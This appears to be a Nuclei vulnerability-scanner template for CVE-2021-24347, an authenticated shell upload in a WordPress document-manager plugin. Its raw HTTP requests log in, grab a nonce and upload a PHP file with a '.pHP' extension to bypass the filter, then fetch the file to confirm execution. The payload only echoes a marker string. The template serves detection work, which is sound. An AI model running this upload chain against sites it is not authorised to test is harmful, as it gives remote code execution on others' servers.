105 lines
4.0 KiB
YAML
105 lines
4.0 KiB
YAML
id: CVE-2021-24347
|
|
|
|
info:
|
|
name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.
|
|
remediation: Fixed in version 4.22.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
|
|
- https://wordpress.org/plugins/sp-client-document-manager/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
|
|
- http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
|
|
- https://github.com/Hacker5preme/Exploits
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2021-24347
|
|
cwe-id: CWE-178
|
|
epss-score: 0.96895
|
|
epss-percentile: 0.99708
|
|
cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
vendor: smartypantsplugins
|
|
product: sp_project_\&_document_manager
|
|
framework: wordpress
|
|
tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="cdm_upload_file_field"
|
|
|
|
{{nonce}}
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="_wp_http_referer"
|
|
|
|
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="dlg-upload-name"
|
|
|
|
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
|
|
Content-Type: image/svg+xml
|
|
|
|
<?php
|
|
|
|
echo "CVE-2021-24347";
|
|
|
|
?>
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="dlg-upload-notes"
|
|
|
|
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
|
|
Content-Disposition: form-data; name="sp-cdm-community-upload"
|
|
|
|
Upload
|
|
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
|
|
- |
|
|
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(header_4, "text/html")
|
|
- status_code_4 == 200
|
|
- contains(body_4, "CVE-2021-24347")
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: nonce
|
|
group: 1
|
|
regex:
|
|
- name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
|
|
internal: true
|
|
# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950 |